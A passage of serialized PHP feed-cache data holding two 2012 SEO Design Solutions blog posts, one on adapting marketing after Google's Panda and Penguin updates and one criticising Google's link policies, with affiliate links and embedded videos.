Ok, perhaps not this time right? It&#8217;s obvious that the image/message and timing doesn&#8217;t coinside as a strong call to action.</p>\n<p>The point remains that regardless of the website a consumer is frequenting, conversion is merely a matter of enlivening synchronicity (between their needs and desires to your<strong> perfect solution</strong> via a product or service) to facilitate an impulse to purchase.</p>\n<p>This fact was often overlooked entirely from SEO practitioners prior to Penguin who focused solely on <em>fabricating lackluster content</em> and flinging it in a thousand directions in an attempt to get links. Content farms thrived, comment spam, forum links and network sites were the rave.</p>\n<p>The truth is, most SEO practioners missed the boat from taking short cuts with their primary and promotional content. The notion that people would actually consume or be persuaded by fodder (lackluster content) and purchase is ridiculous. Don’t make the same mistake…<strong>tap the web</strong>, not just Google as a source of revenue.</p>\n<h3>Why Has Our Blog Been So Quiet for 3 Months?</h3>\n<p>In case you have wondered why the 3 month silence on the <a href=\"http://www.seodesignsolutions.com/blog/\">SEO Design Solutions</a> Blog, On April 8th, I survived a horrific motorcycle crash avoiding a minivan that took my lane while I was riding my Ducati 996 at 90 MPH. It resulted in tumbling twisting and sliding nearly 900 feet on the Freeway (like a bowling ball). </p>\n<p>Although the bike is totalled, I have multiple broken bones and some bumps and bruises (which are all healing now), thankfully, I survived with no brain injury or spinal damage.</p>\n<p>However, during the last 90 days, we have continued to make updates to <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a> “<strong>The Real All-In One SEO Plugin</strong>” and <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/sneak-peak-of-the-wp-ultimate-theme-by-seo-design-solutions%E2%84%A2/\">The WP Ultimate Theme</a> – our sleek, flexible, WordPress Theme Framework (designed to give existing WordPress frameworks a run for their money).</p>\n<p>Also, later this month our lead developer <a href=\"http://profiles.wordpress.org/JohnLamansky/\">John Lamansky</a> plans to release an updated video for all the SEO Ultimate features from version .5 to present (which includes dozens of tips, updates and tweaks).</p>\n<p>Shortly thereafter, we will release our beta version of WP Ultimate for suggestions and tweaks for the final version. Until then, thank you for your patience and welcome to the new paradigm and it’s herald and summary – <span style=\"text-decoration: underline;\">it’s not about links</span>, it’s about promotions.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=0o45EW4lGDs:V-R8cyMHOOs:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/0o45EW4lGDs\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:357:\"Rather than overreact to rankings alone and scream the sky is falling, for the past 15 months we have been quietly testing new strategies that can withstand the likes of Panda (a quality control classifier) and Penguin (a thematic link sniffing filter) that demotes websites with excessive inbound anchor text  i.e. “unnatural” link signals. Keep [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"13\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:124:\"http://www.seodesignsolutions.com/blog/seo-videos/seo-overhauled-it%e2%80%99s-not-about-links-it%e2%80%99s-about-promotions/\";}s:7:\"summary\";s:357:\"Rather than overreact to rankings alone and scream the sky is falling, for the past 15 months we have been quietly testing new strategies that can withstand the likes of Panda (a quality control classifier) and Penguin (a thematic link sniffing filter) that demotes websites with excessive inbound anchor text  i.e. “unnatural” link signals. Keep [...]\";s:12:\"atom_content\";s:18883:\"<p>Rather than overreact to rankings alone and scream the sky is falling, for the past 15 months we have been quietly testing new strategies that can withstand the likes of <strong>Panda</strong> (<em>a quality control classifier</em>) and <strong>Penguin</strong> (<em>a thematic link sniffing filter</em>) that demotes websites with excessive inbound anchor text  i.e. <strong>“unnatural”</strong> link signals.</p>\n<div id=\"attachment_9123\" class=\"wp-caption aligncenter\" style=\"width: 509px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-videos/seo-overhauled-it%E2%80%99s-not-about-links-it%E2%80%99s-about-promotions/\"><img class=\"size-full wp-image-9123\" title=\"SEO-Overhaul\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/07/SEO-Overhaul.jpg\" alt=\"SEO Overhauled\" width=\"499\" height=\"518\" /></a><p class=\"wp-caption-text\">It&#39;s Not About Links, It&#39;s About Promotions</p></div>\n<p>Keep in mind suspicious or contrived <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/seo-rankings-trust-and-relevance-signals/\">link signals</a> could imply a wide variety of possibilities, such as:</p>\n<ul>\n<li>Unnatural <a href=\"http://www.seodesignsolutions.com/blog/link-building/balancing-link-diversity-link-velocity-and-link-volume/\">link velocity</a> (building or losing links too fast).</li>\n<li>Excessive anchor text, i.e. a high percentage of the same or similar anchor-text.</li>\n<li> Links from mixed-fruit / atypical websites that lack genuine/natural signals such as (1) supporting / thematic inbound links (2) traffic and engagement or (3) social signals (which is why many generic link networks failed to get past Penguin).</li>\n</ul>\n<p><span id=\"more-9122\"></span><br />\nIt&#8217;s no secret that two Google algorithm changes (<strong>Penguin</strong> and <strong>Panda</strong>) nearly eradicated SEO as we knew it, however,one thing is certain about SEO, the fact that it&#8217;s always adapting or in a state of flux.</p>\n<p>Adaptation in this instance implies (a) understanding the entire keyword climate for all educational or promotional key phrases that consumers are using while progressing through the sales cycle (b) using that language strategically in titles, on page content, <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=www.networkempire.com/sales-page/silo-plugin-sales-page/\">in your promotions</a> (content, images and links) and (c) in the social graph as hooks <strong>that all drive traffic back to your branded promotional properties</strong> or your <strong>primary website. </strong>Expanding this process systemically facilitates perpetual conversions.</p>\n<h3>Is SEO Dead As We Know It?</h3>\n<p>Have the rules changed? Absolutely! Is SEO dead? <em>In its previous embodiment</em>, to a large extent, yes!  So, the bottom line is (1) what now? And (2) <strong>how do I broadcast my brand and my message</strong> instead of merely churning mediocre content or fiddling with low quality backlinks?</p>\n<p>Watch the videos below and learn how to quickly create your own thematically relevant <strong>“personal broadcast network”</strong> using WordPress, <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=www.networkempire.com/sales-page/silo-plugin-sales-page/\">DWS</a> and our plugin amply named “<a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=www.networkempire.com/sales-page/silo-plugin-sales-page/\">The Silo Blog Builder</a>”. Afterwards, make sure to  watch the webinar (further down the page) for an in depth overview of the new DWS 4.0 online promotion paradigm.</p>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"500\" height=\"281\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/EB5qMffmAKQ?version=3&amp;hl=en_US\" /><param name=\"allowfullscreen\" value=\"true\" /><embed type=\"application/x-shockwave-flash\" width=\"500\" height=\"281\" src=\"http://www.youtube.com/v/EB5qMffmAKQ?version=3&amp;hl=en_US\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>Put simply, if your primary website lacks traffic or sales, then no amount of outdated SEO (circa. the Google Penguin update April 2012) will make a difference. It’s not just about rankings; it’s about how scalable your traffic sources are and how adept you are in extracting <strong>relevant traffic on demand</strong>.</p>\n<h3>Spoiler Alert Regarding Blog Networks!!!</h3>\n<p>Do mixed-fruit blog networks still work? No! or at least until a filter weeds them out. However, <strong>theme relevant networks </strong>still pass ranking factor (and can serve as a branded broadcast beacon for extended promotions), which means a link  from <strong>site B</strong> to <strong>site A</strong> must be <a href=\"http://www.seodesignsolutions.com/blog/seo-videos/seo-video-how-to-properly-silo-your-website/\">theme relevant</a> (have the same topic) and use the appropriate anchor text along  with related synonyms (a.k.a. the DNA Braid) to avoid overoptimization filters or being smacked / deindexed.</p>\n<p>If you are creating a beacon/site, it also helps to create stellar content (worthy of social media) and syndicate that content (to build links to your links) and ensure the longevity of your <strong>&#8220;broadcast channel&#8221;</strong>.</p>\n<p>The new paradigm suggests to look past rankings and think of <strong>each site or promotional property</strong> as a beacon, broadcasting YOU (your brand), All the Time, Right NOW!</p>\n<h3>It’s Not About Links, It’s About Promotions!</h3>\n<p>In a competitive online environment, using obsolete legacy metrics (such as search engine rankings and only using one website to compete) is defunct as a viable strategy.</p>\n<p>The imperative <strong>metrics</strong> to consider are (1) how scalable are your personal broadcast networks? and (2) how theme relevant and extensive are your syndication sequences for generating <strong>traffic</strong> which is <em>the only metric that matters</em>.</p>\n<p>Learn <strong>how to create a proper promotional campaign</strong>, including:</p>\n<ul>\n<li>which keywords to use</li>\n<li>how much those keywords are worth to your business</li>\n<li>how long it will take to get ranked</li>\n<li>how to use website silo architecture  to build your website</li>\n<li>which content , synonyms and type of promotions you need to drive traffic</li>\n<li>knowing which social media sites, RSS directories, video sites or press release<br />\nsources to use and having a project management suite to coordinate your team.</li>\n</ul>\n<h3>Take The Next Step: Watch the <a href=\"http://www.networkempire.com/dap/a/?a=152\">DWS 4.0</a> Webinar!</h3>\n<p><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" width=\"500\" height=\"375\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\"><param value=\"http://www.youtube.com/v/txB97iCsUmU?version=3&amp;hl=en_US\" /><param name=\"allowFullScreen\" value=\"true\" /><param name=\"allowscriptaccess\" value=\"always\" /><param name=\"src\" value=\"http://www.youtube.com/v/txB97iCsUmU?version=3&amp;hl=en_US\" /><param name=\"allowfullscreen\" value=\"true\" /><embed type=\"application/x-shockwave-flash\" width=\"500\" height=\"375\" src=\"http://www.youtube.com/v/txB97iCsUmU?version=3&amp;hl=en_US\" allowscriptaccess=\"always\" allowfullscreen=\"true\"></embed></object></p>\n<p>Sure, on page SEO is still important, however quality content and engagement is a metric you simply can’t afford to overlook, and about that “<em>off page SEO thing</em>”, yeah, <a href=\"http://www.seodesignsolutions.com/blog/seo/how-to-avoid-seo-over-optimization/\">over optimization</a> is real, but just keep in mind, now, it’s not just about links, it’s about promotions.</p>\n<p>Allow me to explain!</p>\n<p><strong>People Hemmed up in Panda and Penguin Algorithms Typically:</strong></p>\n<ol>\n<li>Got a bit too greedy with off page SEO (link metrics) and churned out as much content to build links as possible (without thinking of quality).As a result, Google struck back with their quality control algorithms which comprised stricter filters, classifiers and relevance signals, (i.e. social signals, engagement time, bounce rate, <em>thematic relevance of the link graph</em> for the target and refering site) and 200 other <strong>fancy smancy words</strong> that translate to <strong>“if your website sucks, then good luck finding it in their SERPs&#8221;</strong>).</li>\n<li>People hemmed up in the Panda / Penguin Algo had a tendency to get a bit too lose with quality control on their promotional content and found out that <strong>regardless of the traffic source</strong> – you <strong>MUST</strong> have something useful to contribute.Otherwise, your content will simply be skimmed over for something useful and ignored vs. starting with a solid foundation of engaging contnent and promotional content to begin with.</li>\n<li>Websites drastically afftected by Panda or Penguin often relied too heavily on one metric (such as links)  because it was working and thus became complacent in regard to seeking viable alternatives or finding new ways to reach their ideal consumer.</li>\n</ol>\n<p>Remember, Google is merely one traffic source; a very popular one, but not  every consumer uses or purchases exclusively through their link/traffic/ sales funnel. This means, there are a myriad of <strong>alternate traffic funnels</strong> that you can leverage systematically to reach your audience contextually, socially or otherwise.</p>\n<p>A consumer’s impulse to purchase is either active or dormant, yet if that dormant spark of desire is enlivened through curiosity, a clever headline, utility or impulse, then conversion is merely a few clicks away. Conversions (making a sale) is not exclusive to Google, in fact, conversions can occur from a multitude of sources.</p>\n<p>For example, a conversion could occur from:</p>\n<ul>\n<li>playing a game online and being lured by an enticing banner</li>\n<li>during social interactions on Facebook (or other social platforms) from banners or contextual links<br />\nbeing lured from teaser “check this out” social media content or images in their various clever iterations</li>\n<li>from reading articles and clicking the contextual links (after social proof is established).</li>\n</ul>\n<p>This process, setting up the sales funnel should not be left to happenstance alone. In fact, when we map this phase of a campaign for a new client, we use what <a href=\"http://www.youtube.com/watch?v=jsS8Zppd_q4\">Russell Wright</a> brilliantly coined as the <strong>IS-DNA</strong>. The letter &#8220;I&#8221; in &#8220;IS-DNA&#8221; stands for Invention/Innovation/Industry and the &#8220;S&#8221; stands for &#8220;Solution&#8221;.</p>\n<div id=\"attachment_9124\" class=\"wp-caption aligncenter\" style=\"width: 510px\"><a href=\"http://www.networkempire.com/dap/a/?a=152\"><img class=\"size-full wp-image-9124\" title=\"Network-Empire-DWS-DNA\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/07/Network-Empire-DWS-DNA.jpg\" alt=\"Network-Empire-DWS-DNA\" width=\"500\" height=\"375\" /></a><p class=\"wp-caption-text\">Understanding Promotion as a Stackable Process</p></div>\n<p>When we speak of &#8220;DNA&#8221; in our material we simply mean &#8220;components of&#8221; or <strong>&#8220;building blocks of&#8221;</strong>.</p>\n<p>So &#8220;IS-DNA&#8221; translates into the &#8220;building blocks&#8221; of your innovation or invention that you have provided to your industry.</p>\n<p>The purpose of the IS-DNA process is to align your market&#8217;s FAQs (frequently asked questions) with your market&#8217;s SAQ&#8217;s (should ask questions) by drilling down and getting to <strong>&#8220;the questions behind the questions&#8221;</strong>, or <strong>&#8220;the pain behind the questions</strong>&#8221; which will be used later to create highly converting articles and videos using the PAM (painkiller article method).</p>\n<p>Remember that we are giving you a <a href=\"http://www.networkempire.com/dap/a/?a=152\">highly profitable stack-able business process</a>, and the IS-DNA may very well be the most important part of the entire process, because it is the BASE of your PLMM (Perpetual Lead Magnet Machine) System and Pyramid. <strong>Get this wrong</strong> and you may end up <strong>using the wrong language to talk to the wrong market!</strong></p>\n<p>The IS-DNA set&#8217;s the stage by creating a matrix of market questions in order to help you select the most effective language that can reach your target market because you (and your team) will truly understand the problems and pains that have been solved for them by your product or service (innovation or invention).</p>\n<p>Once you have mapped out <strong>“the pain in the market”</strong>, you can tactfully craft “<a href=\"http://www.theme-zoom.com/krakken12/pdf/the-4-million-dollar-market-research-questions.pdf\">pain killers</a>” (PDF Download) in your content, videos, social media and/or promotions to transcend <em>traffic-dependency</em> (such as Google) to devour your entire market. To thrive, you’ll have to escape the grasp of one simple traffic funnel to flourish.</p>\n<p>Whenever you rely solely on a <strong>“<em>for profit business</em>”</strong>, <em>that business</em> (potentially) has the ability to <strong>endanger your bottom line</strong>. Just as the “<em>eggs in one basket</em>” adage comes to mind, the question is, are you still in Google’s pocket? Or have you considered a long-term contingent strategy diverse enough to flourish (if Google or your most lucrative traffic source simply stopped providing traffic?).</p>\n<p>To avoid putting your business at risk you must hedge your primary property with branded social media and third-party websites (just in case). Consider Google’s last algorithm change Penguin. Many who were unprepared suffered, as their once profitable websites spigot of traffic got shut off, <strong>forcing them to find alternatives</strong> &#8211; rather than diverisfying and being prepared (as if Google never existed) in the first place.</p>\n<p>In order to do that, you must change the way you think, which means instead of thinking about <strong>backlinks and on page optimization</strong>, replace on page SEO with “<em>genuinely engaging content</em>” and replace backlinks with the idea of “<em>broadcasts</em>” and “<em>promotions</em>” and broadcasting your brand (across hundreds of traffic-bearing sources) using a <a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=www.networkempire.com/testimonials/\">stackable / repeatable process</a> that YOU control.</p>\n<p>Remember, backlinks are merely a byproduct of promotions if you don’t have anything worthy of sending traffic to, then visitors will simply bounce in search of better content; so, there is no need to put the cart before the horse.</p>\n<div id=\"attachment_9127\" class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-marketing/how-to-get-your-seo-call-to-action-and-conversion-on-the-same-page/\"><img class=\"size-full wp-image-9127\" title=\"call-to-action\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/07/call-to-action.jpg\" alt=\"Call to Action\" width=\"400\" height=\"486\" /></a><p class=\"wp-caption-text\">Does Your Content Have a Clear Call to Action?</p></div>\n<p>After seeing the image above, did you want to buy something? Ok, perhaps not this time right? It&#8217;s obvious that the image/message and timing doesn&#8217;t coinside as a strong call to action.</p>\n<p>The point remains that regardless of the website a consumer is frequenting, conversion is merely a matter of enlivening synchronicity (between their needs and desires to your<strong> perfect solution</strong> via a product or service) to facilitate an impulse to purchase.</p>\n<p>This fact was often overlooked entirely from SEO practitioners prior to Penguin who focused solely on <em>fabricating lackluster content</em> and flinging it in a thousand directions in an attempt to get links. Content farms thrived, comment spam, forum links and network sites were the rave.</p>\n<p>The truth is, most SEO practioners missed the boat from taking short cuts with their primary and promotional content. The notion that people would actually consume or be persuaded by fodder (lackluster content) and purchase is ridiculous. Don’t make the same mistake…<strong>tap the web</strong>, not just Google as a source of revenue.</p>\n<h3>Why Has Our Blog Been So Quiet for 3 Months?</h3>\n<p>In case you have wondered why the 3 month silence on the <a href=\"http://www.seodesignsolutions.com/blog/\">SEO Design Solutions</a> Blog, On April 8th, I survived a horrific motorcycle crash avoiding a minivan that took my lane while I was riding my Ducati 996 at 90 MPH. It resulted in tumbling twisting and sliding nearly 900 feet on the Freeway (like a bowling ball). </p>\n<p>Although the bike is totalled, I have multiple broken bones and some bumps and bruises (which are all healing now), thankfully, I survived with no brain injury or spinal damage.</p>\n<p>However, during the last 90 days, we have continued to make updates to <a href=\"http://wordpress.org/extend/plugins/seo-ultimate/\">SEO Ultimate</a> “<strong>The Real All-In One SEO Plugin</strong>” and <a href=\"http://www.seodesignsolutions.com/blog/wordpress-seo/sneak-peak-of-the-wp-ultimate-theme-by-seo-design-solutions%E2%84%A2/\">The WP Ultimate Theme</a> – our sleek, flexible, WordPress Theme Framework (designed to give existing WordPress frameworks a run for their money).</p>\n<p>Also, later this month our lead developer <a href=\"http://profiles.wordpress.org/JohnLamansky/\">John Lamansky</a> plans to release an updated video for all the SEO Ultimate features from version .5 to present (which includes dozens of tips, updates and tweaks).</p>\n<p>Shortly thereafter, we will release our beta version of WP Ultimate for suggestions and tweaks for the final version. Until then, thank you for your patience and welcome to the new paradigm and it’s herald and summary – <span style=\"text-decoration: underline;\">it’s not about links</span>, it’s about promotions.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=0o45EW4lGDs:V-R8cyMHOOs:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/0o45EW4lGDs\" height=\"1\" width=\"1\"/>\";}i:15;a:12:{s:5:\"title\";s:24:\"Google’s Greatest Fear\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/c3NjkKxSVOY/\";s:8:\"category\";s:3:\"SEO\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Sat, 07 Apr 2012 09:36:57 PDT\";s:4:\"guid\";s:65:\"http://www.seodesignsolutions.com/blog/seo/googles-greatest-fear/\";s:7:\"content\";a:1:{s:7:\"encoded\";s:10808:\"<p>With millions of business owners, webmasters and affiliates spending thousands of dollars on SEO and countless hours spent optimizing their websites (only to have Gogle organic search results <strong>shaken up or completely whisked away</strong> due to vaccilating shifts from new <a href=\"http://searchengineland.com/google-confirms-panda-update-link-evaluation-local-search-rankings-113078\">algorithm changes)</a> is genuinely creating feelings of anger, frustration and disdain.</p>\n<div id=\"attachment_9113\" class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/seo/googles-greatest-fear/\"><img class=\"size-full wp-image-9113\" title=\"google-ignored\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/04/google-ignored.jpg\" alt=\"Google Greatest Fear\" width=\"400\" height=\"425\" /></a><p class=\"wp-caption-text\">Google’s greatest fear is you not using or needing to use Google...</p></div>\n<p>As if running a business wasn&#8217;t hard enough, business owners are now forced to deal with the <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/the-rise-and-fall-of-rankings/\">rise and fall of search engine results</a> (knowing that at any time aside from ruthless competitors targeting their most coveted positions that a <a href=\"http://www.seodesignsolutions.com/blog/seo/warning-search-engine-algorithm-changes-detected/\">new algorithm change</a> could come along and potentially <em>sweep all their progress under the rug) </em>without warning.</p>\n<p>The only solution is to either (1) conform or (2) diversify your traffic sources to become less dependent on any one source of visitors, however, most are either unwilling or unaware of their options, so they continue to run on the treadmill in hope of stability.</p>\n<p><span id=\"more-9114\"></span></p>\n<p>For large or small businesses alike faced with overhead, cash flow and competition; conforming or overly depending on any one traffic source (Google) is not a viable solution for creating long-term stability.</p>\n<p>Faced with violent shifts in rankings and either posting record profits or losses based on where you rank is a type of <strong>traffic-dependency</strong>. That dependency can be weaned and replaced if those same business owners took their searches or paid search budget to other viable search engines and / or traffic sources to funnel traffic.</p>\n<p>Objectively, it’s time to see things for what they really are; the fact that Google (not surprisingly) is a business model motivated by profits. Despite the <strong>“don’t be evil”</strong> motto which once brandished a blind eye from most, with recent allegations of <a href=\"http://en.wikipedia.org/wiki/Criticism_of_Google\">privacy concerns</a>, changes in Adwords policies (which left thousands banned <strong>with no explanation</strong>) and the constant organic search algorithm shuffle, at some point users will come to terms with this and act accordingly (and ignore Google).</p>\n<h3>The Pervasive Threat of Google Penalties</h3>\n<p>Recently Google informed untold numbers of webmasters that they were in <a href=\"http://next.inman.com/2012/04/google-evolves-are-you-ready/\">violation of their terms of service</a> for unnatural link activity. Needless to say, the fear of loss is a great motivator. When people are told to conform, most will to avoid going against the current of the status quo.</p>\n<p>However, the audacity that webmasters should conform to a terms of service (considering they didn&#8217;t opt in in the first place) based on Google&#8217;s limitation on determining the value of the link graph (paid link, intentional link, unintenional link, etc.) is preposterous. It&#8217;s not like anyone in their index ever received a request asking if it was ok to crawl your content and include it in their index?</p>\n<p>Does CNN, New York Times, USA today or other massive authority sites add rel=”nofollow” tags to every outbound link or risk getting deindexed? No, they do not… Then why should you have to?</p>\n<p>The fact is that websites with that extent of authority simply don’t need Google (because they already have an established brand) and users will go directly to their website instead of using Google as an intermediary (which is essentially all they are).</p>\n<p>And how <strong>“relevant”</strong> would Google be if a user typed in CNN in Google and couldn’t find CNN (or any large brand for that matter), which makes brands essentially immune to being banned from their search results.</p>\n<p>Yet, for small businesses, entrepreneurs, affiliates and others forced to compete daily in search engines to funnel traffic to thrive and survive are constantly pummeled by the vague terms of service which essentially means you cannot promote your website (unless it’s done according to Google’s promotional policy).</p>\n<h3>Google&#8217;s Stance on Links is Dated</h3>\n<p>Sorry, the last time I checked links were not exclusively designed to manipulate PageRank, <strong>links are just links</strong>, the are simply how people move <em>from page to page and website to website</em>. Just as freedom of speech exists, the freedom to link to <strong>who you like when you like</strong> exists in the same vein.</p>\n<p>The only difference (mind you) is intent and links are either designed to deliver visitors from Page A to Page B or to promote – it’s that simple. And<strong> people are going to promote their business by necessity in order to create a profit</strong> so, I don’t see links going away any time soon, so, Google you will simply have to adapt (and stop penalizing webmasters) or they will simply move on to other traffic funnels.</p>\n<p>The point I am making is, if Google were losing money due to their massive operation, do you think they would have the time, energy or resources to keep <strong>“shaking things up”</strong> in the organic search results in the name of search quality?</p>\n<p>Would they have time to ban countless advertisers (since they collectively are not worth the time to service compared to fortune 500 and up clientele)? – I think not.</p>\n<h3>Is Google&#8217; Greatest Fear Competition or Complacency?</h3>\n<p>With Facebook (the social giant) and Apple (the mobile giant)  both considering entering the search engine space, Google could potentially have some SERIOUS competition ahead (unlike Yahoo or Bing) and which suggests that…</p>\n<p>Google biggest fear is:</p>\n<p>1)      They will become obsolete as the preferred organic search engine and lose their monopoly (and profit).</p>\n<p>2)      Paid search will fail to deliver (since organic search is no longer “the cats meow” for disgruntled users) and the organic traffic base will diminish.</p>\n<p>3)      The curve will change (which is the most likely) meaning that new technologies, platforms, methods and/or solutions will emerge and people will simply move on from typing keywords in to search engines and use alternative methods such as apps, HTML5 or other alternatives to have media or commerce delivered on demand.</p>\n<p>The cycle of emerging innovation (from BBS, to directories, to search engines) followed by user adaptation which now borders on user complacency has already reached the point of consolidation.</p>\n<p>This implies that the cycle is ripe for change and a new potential curve (such as <a href=\"http://www.apple.com/iphone/features/siri.html\">Apples Siri</a>) or other alternatives to search could make the previous achievement obsolete (e.g. pagers, cassette tapes, VCR’s, the Yellow Pages).</p>\n<p>However, at the time (back in the day) few were looking past the phase of user complacency and would still be using Pagers, cassette tapes, VCR’s, etc. if new innovations and curves had not usurped them, now making them obsolete.</p>\n<p>While most people didn’t know (or care) what a search engine was 10 years ago, fast forward 10 years and they may not even be able to remember.</p>\n<p>Keep in mind, the market is fickle and here today gone tomorrow can happen faster with the acceleration of communication and new emerging technologies.</p>\n<h3>The Take Away to Remeber</h3>\n<p>1)      The very data in <strong>Google&#8217;s index</strong> that they attempt to police and enforce <strong>does not belong to them</strong>, it belongs to the others (those who wrote it) and the web at large who are generous enough to share. Google does not create the content their index, you do and <strong>how you promote it</strong> is up to you.</p>\n<p>2)      The web is bigger than Google and you decide Google’s fate every time you search on their platform or choose another search engine you cast your vote. There are thousands of traffic funnels to drive visitors to your websites aside from search engines (investigate them for viability to your business).</p>\n<p>3)      Google telling people to jump through hoops (in fear of a ranking penalty or removal from <strong>their index</strong>) is a Pandora’s Box they should leave behind (or they might be left behind on the next emerging curve from those same banned/penalized users).</p>\n<p>In closing,<strong> Google’s greatest fear is you not using them </strong>and while their business model is brilliant, they&#8217;re the most successful company in history to profit from (1) using content created from other websites via crawling and indexing technology (2) create a synergistic advertising model <em>as an accessory</em> to their organic search results and (3)  getting paid to send traffic <em>away from their own site</em> as an authoritative intermediary – this curve, put simply, has  its limitations, particularly, if any of the aforementioned metrics change, (such as Google having to ask permission to crawl your data).</p>\n<p>Fortunately for us (based on previous experience), we know that consumers are fickle and at any time they could opt-out and frequent other websites which have more emotional, funcional or curb appeal than Google. Google started as one website and can potentially be reduced to that <em>if people choose not to use it</em>.</p>\n<p>This means you, the users hold the key to just how much power or control you wish to allow it to have over you or your business.</p>\n<p>Feel free to share your thoughts below…</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=c3NjkKxSVOY:arivhTVcDC4:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/c3NjkKxSVOY\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:370:\"With millions of business owners, webmasters and affiliates spending thousands of dollars on SEO and countless hours spent optimizing their websites (only to have Gogle organic search results shaken up or completely whisked away due to vaccilating shifts from new algorithm changes) is genuinely creating feelings of anger, frustration and disdain. As if running a [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:2:\"18\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:65:\"http://www.seodesignsolutions.com/blog/seo/googles-greatest-fear/\";}s:7:\"summary\";s:370:\"With millions of business owners, webmasters and affiliates spending thousands of dollars on SEO and countless hours spent optimizing their websites (only to have Gogle organic search results shaken up or completely whisked away due to vaccilating shifts from new algorithm changes) is genuinely creating feelings of anger, frustration and disdain. As if running a [...]\";s:12:\"atom_content\";s:10808:\"<p>With millions of business owners, webmasters and affiliates spending thousands of dollars on SEO and countless hours spent optimizing their websites (only to have Gogle organic search results <strong>shaken up or completely whisked away</strong> due to vaccilating shifts from new <a href=\"http://searchengineland.com/google-confirms-panda-update-link-evaluation-local-search-rankings-113078\">algorithm changes)</a> is genuinely creating feelings of anger, frustration and disdain.</p>\n<div id=\"attachment_9113\" class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/seo/googles-greatest-fear/\"><img class=\"size-full wp-image-9113\" title=\"google-ignored\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2012/04/google-ignored.jpg\" alt=\"Google Greatest Fear\" width=\"400\" height=\"425\" /></a><p class=\"wp-caption-text\">Google’s greatest fear is you not using or needing to use Google...</p></div>\n<p>As if running a business wasn&#8217;t hard enough, business owners are now forced to deal with the <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/the-rise-and-fall-of-rankings/\">rise and fall of search engine results</a> (knowing that at any time aside from ruthless competitors targeting their most coveted positions that a <a href=\"http://www.seodesignsolutions.com/blog/seo/warning-search-engine-algorithm-changes-detected/\">new algorithm change</a> could come along and potentially <em>sweep all their progress under the rug) </em>without warning.</p>\n<p>The only solution is to either (1) conform or (2) diversify your traffic sources to become less dependent on any one source of visitors, however, most are either unwilling or unaware of their options, so they continue to run on the treadmill in hope of stability.</p>\n<p><span id=\"more-9114\"></span></p>\n<p>For large or small businesses alike faced with overhead, cash flow and competition; conforming or overly depending on any one traffic source (Google) is not a viable solution for creating long-term stability.</p>\n<p>Faced with violent shifts in rankings and either posting record profits or losses based on where you rank is a type of <strong>traffic-dependency</strong>. That dependency can be weaned and replaced if those same business owners took their searches or paid search budget to other viable search engines and / or traffic sources to funnel traffic.</p>\n<p>Objectively, it’s time to see things for what they really are; the fact that Google (not surprisingly) is a business model motivated by profits. Despite the <strong>“don’t be evil”</strong> motto which once brandished a blind eye from most, with recent allegations of <a href=\"http://en.wikipedia.org/wiki/Criticism_of_Google\">privacy concerns</a>, changes in Adwords policies (which left thousands banned <strong>with no explanation</strong>) and the constant organic search algorithm shuffle, at some point users 